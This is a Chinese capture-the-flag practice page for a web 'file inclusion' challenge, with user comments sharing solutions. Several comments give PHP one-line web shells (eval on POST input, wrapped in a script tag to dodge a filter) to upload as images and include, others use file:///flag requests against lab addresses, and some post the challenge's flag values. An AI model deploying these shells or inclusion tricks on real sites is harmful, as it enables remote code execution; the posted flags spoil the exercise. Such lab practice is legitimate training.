文件包含2WEB 未解决

分数: 35 金币: 4
题目作者: 未知
一  血: dotast
一血奖励: 3金币
解  决: 3368
提  示: 文件包含
描  述:
文件包含2
评论
yanqiye 6天前

用file=/flag取巧做法,真正做题名字肯定要变,预期做法:传一句话,发现php标签被删了,直接用<?= @eval($_POST[1]);就可以了。

回复 0

G3tcH4r 1月前

花金币看了WP,不过自己试了下,发现script 设置language为php,也可以传能执行命令的马儿,这题蛮有意思

回复 0

迷茫的三千面 1月前

flag{414a91ba57a5e0b5a4eb725b75f5030e}

回复 0

hao7 1月前

flag{69fc76f3ef98a524a3ef56977fc02278}

回复 0

CHLing 6月前

http://114.67.175.224:18550/index.php?file=//flag

回复 1

qiusheng 9月前

1、找到文件包含的路径XXXindex.php?file=upload.php;上传一句话木马(格式保存为jpg)<script language="php">@eval($_POST[cmd])</script> 2、上传完成后访问上传的路径看是否成功。XXX/index.php?file=upload/xxx.jpg 3、用蚁剑连接,url是XX

回复 0

xiaoxiao972521 9月前

虽然index.php?file=/flag 就出来了,但是依旧执着的绕过了upload.php

回复 4
冯飞99 9月前

绕来绕去看到你的评论一把过

回复 2

zzccbb2005 1年前

http://114.67.175.224:10017/index.php?file=file:///flag flag{27d76583b9a54c6ef8af91f66855ac12}

回复 1

109张某 1年前

这个题一句话传好像有些问题,我传了一堆,就只有下面仁兄的file:///flag方法成功了

回复 0
asd+1024 9月前

传木马的话,用<script language='php'>@eval($_POST['asd']);</script>然后,文件格式.jpg,在文件包含就可以了,file:///flag确实简单

回复 0

不会编程的崽 1年前

<?php>被过滤了,用这个<script language="php">@eval($_POST['attack'])</script>绕过,然后文件包含即可

回复 0

WriteUp

image
harry

4 金币

评分(5)

解题动态

Novo 攻破了该题 2小时前
jiahuiya 攻破了该题 3小时前
axura 攻破了该题 1天前
smyhz 攻破了该题 3天前
besty2k 攻破了该题 3天前
CheungY 攻破了该题 4天前
toonavy 攻破了该题 4天前
hgf15823954335 攻破了该题 4天前
faraway549 攻破了该题 4天前
PY222 攻破了该题 5天前
YameMres 攻破了该题 5天前
hakerzw 攻破了该题 6天前
test1999 攻破了该题 6天前
yanqiye 攻破了该题 6天前
15195388189 攻破了该题 6天前
zzjssb 攻破了该题 7天前
Mambalv 攻破了该题 7天前
madline 攻破了该题 7天前
tolobuick 攻破了该题 8天前
13732263537 攻破了该题 9天前
问题反馈